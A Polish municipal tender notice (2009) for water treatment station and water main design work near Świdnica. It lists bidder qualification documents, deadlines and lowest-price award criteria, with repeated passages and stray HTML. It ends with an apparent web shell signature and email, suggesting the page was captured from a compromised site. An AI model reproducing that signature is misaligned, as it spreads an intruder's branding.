- 	uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów) - art. 12 ust. 2 z uwzględnieniem art. 104 ustawy z dnia 7 lipca 1994r. - Prawo budowlane (j.t. Dz.U.06.156.1118 ze zm.),
- 	aktualny, na dzień składania wniosków o dopuszczenie do udziału w postępowaniu, wpis na listę członków właściwej Izby samorządu zawodowego potwierdzony zaświadczeniem, wydanym przez tę Izbę, zgodnie z przepisami prawa przywołanymi powyżej, sporządzony według wzoru stanowiącego załącznik nr 4 do niniejszej IDW. 
                                                                                                                
4.	Wypełniony formularz  ofertowy  (zgodnie z załącznikiem nr 1 do SIWZ).
5.	Dokumenty, o których mowa w niniejszym punkcie, składane są w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę (osobę upoważnioną do podpisywania oferty).
6.	Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości.
7.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.

WYKONAWCY SKŁADAJĄCY OFERTĘ NA ZADANIE NR 3  MUSZĄ DOŁĄCZYĆ DO OFERTY NASTĘPUJĄCE DOKUMENTY I OŚWIADCZENIA: 

1. 	W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności, oraz nie podlega wykluczeniu na podstawie art. 24 ustawy pzp, Wykonawcy zobowiązani są przedłożyć: 
1) 	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Uwaga: 	Jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, dokument, o którym mowa, musi złożyć każdy z Wykonawców - oddzielnie.
2) 	Oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o nie podleganiu wykluczeniu na podstawie art. 24 ustawy pzp - zgodnie z załącznikiem nr 2 do SIWZ.
3) 	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Uwaga: 	Jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, dokument, o którym mowa, musi złożyć każdy z Wykonawców - oddzielnie.

2. 	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ppkt 1.1), 1.3) niniejszej IDW, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) 	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) 	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organy,
c) 	nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
2.7	Dokumenty, o których mowa w ppkt 2.a) i c) niniejszej IDW, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.8	Dokument, o którym mowa w ppkt 2.b) niniejszej IDW, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
2.9	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 1. i 2., zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. 
3.	W celu potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, Wykonawcy zobowiązani są przedłożyć:
1)	wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie, sporządzony według wzoru stanowiącego załącznik nr 3 do niniejszej IDW. (Wykonawca musi wykazać, iż wykonał co najmniej dwie dokumentacje projektowe dla budowy sieci wodociągowej, w tym jedna o długości co najmniej 2 km i o wartości robót budowlanych zgodnie z kosztorysem inwestorskim minimum 1 mln PLN).
2)	wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i  które będą uczestniczyć w  wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności lub pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, jeżeli dotyczy (art. 22 ust. 1 pkt 2) Ustawy Pzp), w tym co najmniej:   Projektanta w specjalności sanitarnej posiadającego:
- 	uprawnienia budowlane do projektowania  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych (lub odpowiadające im równoważne upraw?nienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów) - art. 12 ust. 2 z uwzględnieniem art. 104 ustawy z dnia 7 lipca 1994r. - Prawo budowlane (j.t. Dz.U.06.156.1118 ze zm.),
- 	aktualny, na dzień składania wniosków o dopuszczenie do udziału w postępowaniu, wpis na listę członków właściwej Izby samorządu zawodowego potwierdzony zaświadczeniem, wydanym przez tę Izbę, zgodnie z przepisami prawa przywołanymi powyżej,sporządzony według wzoru stanowiącego załącznik nr 4 do niniejszej IDW. 
                                                                                                                
4.	Wypełniony formularz  ofertowy  (zgodnie z załącznikiem nr 1 do SIWZ).
5.	Dokumenty, o których mowa w niniejszym punkcie, składane są w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę (osobę upoważnioną do podpisywania oferty).
6.	Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości.
7.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.swidnica.dolnyslask.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ul. B. Głowackiego 4, 58-100 Świdnica, Urząd Gminy Świdnica.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.03.2009 godzina 10:00, miejsce: Ul. B. Głowackiego 4, 58-100 Świdnica, Urząd Gminy Świdnica, parter punkt informacyjny.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie dokumentacji projektowo-kosztorysowej na zadanie pn. Budowa stacji uzdatniania wody na działce nr 183/2 w Komorowie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zadania obejmuje opracowanie dokumentacji projektowo-kosztorysowej na wykonanie:      
 1. automatycznej stacji uzdatniania wody pochodzącej z ujęć podziemnych,  zlokalizowanej na działce nr 183/2 w Komorowie,  wydajność stacji ok. 40m3/h 
2. zbiornika wody o parametrach dostosowanych do wydajności stacji uzdatniania wody
3. odstojnika popłuczyn 
4. przyobiektowych urządzeń, sieci wod-kan i elektrycznych, instalacji monitoringu i instalacji alarmowych i monitorowych terenu,
5. likwidację istniejącej stacji uzdatniania wody wraz z przynależną infrastrukturą.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie dokumentacji projektowo-kosztorysowej na zadanie pn.Budowa stacji uzdatniania wody na działce nr 96/38 w Jagodniku.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zadania obejmuje opracowanie dokumentacji projektowo-kosztorysowej na wykonanie:       
1. automatycznej stacji uzdatniania wody pochodzącej z ujęć podziemnych,  zlokalizowanej na działce nr 96/38 w Jagodniku ,  wydajność stacji ok. 95m3/h
2. zbiornika wody o parametrach dostosowanych do wydajności stacji uzdatniania wody
3. odstojnika popłuczyn 
4. przyobiektowych urządzeń, sieci wod-kan i elektrycznych, instalacji monitoringu i instalacji alarmowych i monitorowych terenu..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie dokumentacji projektowo-kosztorysowej na zadanie pn.Budowa wodociągu  tranzytowego  Miłochów-Pszenno.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zadania obejmuje opracowanie dokumentacji projektowo-kosztorysowej na wykonanie odcinka sieci wodociągowej tranzytowej o dł. około 3,3 km łączącego istniejącą sieć wodociągową O 160 w miejscowości Miłochów z istniejącą  siecią wodociągową O 110 zlokalizowaną w ulicy Akacjowej i Działkowej w miejscowości Pszenno. W ramach opracowania przewiduje się zaprojektowanie przejścia przez drogę krajową nr 35 o dł. około 35 m..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com